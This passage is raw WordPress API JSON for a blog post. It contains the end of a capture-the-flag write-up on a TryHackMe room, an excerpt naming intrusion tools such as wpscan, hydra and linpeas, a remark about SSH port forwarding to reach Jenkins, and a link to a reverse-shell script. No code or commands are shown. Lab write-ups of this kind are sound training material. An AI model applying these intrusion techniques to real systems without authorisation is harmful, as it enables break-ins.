<\/p>\n<p>Overall, I enjoyed the challenge of this box, especially the part where we set up port forwarding via SSH login to expose the Jenkins login portal to our attack machine.<\/p>\n<p class=\"has-base-background-color has-background\">\ud83d\udc49 <strong>Recommended<\/strong>: <a href=\"https:\/\/blog.finxter.com\/ezpzshell-a-cool-all-in-one-python-script-that-simplifies-revshell-creation\/\" data-type=\"URL\" data-id=\"https:\/\/blog.finxter.com\/ezpzshell-a-cool-all-in-one-python-script-that-simplifies-revshell-creation\/\" target=\"_blank\" rel=\"noreferrer noopener\">EzpzShell: An Easy-Peasy Python Script That Simplifies Revshell Creation<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>CHALLENGE OVERVIEW CTF Creator: TheMayor Link: https:\/\/tryhackme.com\/room\/internal Difficulty: Hard Target: Root\/User flags Highlight: Enumerating a WordPress site with wpscan Tools used: pentest.ws, nmap, dirb, wpscan, hydra, linpeas, ssh with port forwarding Tags: CTF, security, accessible, pentest, blackbox BACKGROUND This CTF challenge is another blackbox-style pentest where we don\u2019t know anything about our [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[857],"tags":[73,468,528],"class_list":["post-131915","post","type-post","status-publish","format-standard","hentry","category-python-tut","tag-programming","tag-python","tag-tutorial"],"_links":{"self":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts\/131915","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/comments?post=131915"}],"version-history":[{"count":0,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts\/131915\/revisions"}],"wp:attachment":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/media?parent=131915"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/categories?post=131915"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/tags?post=131915"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}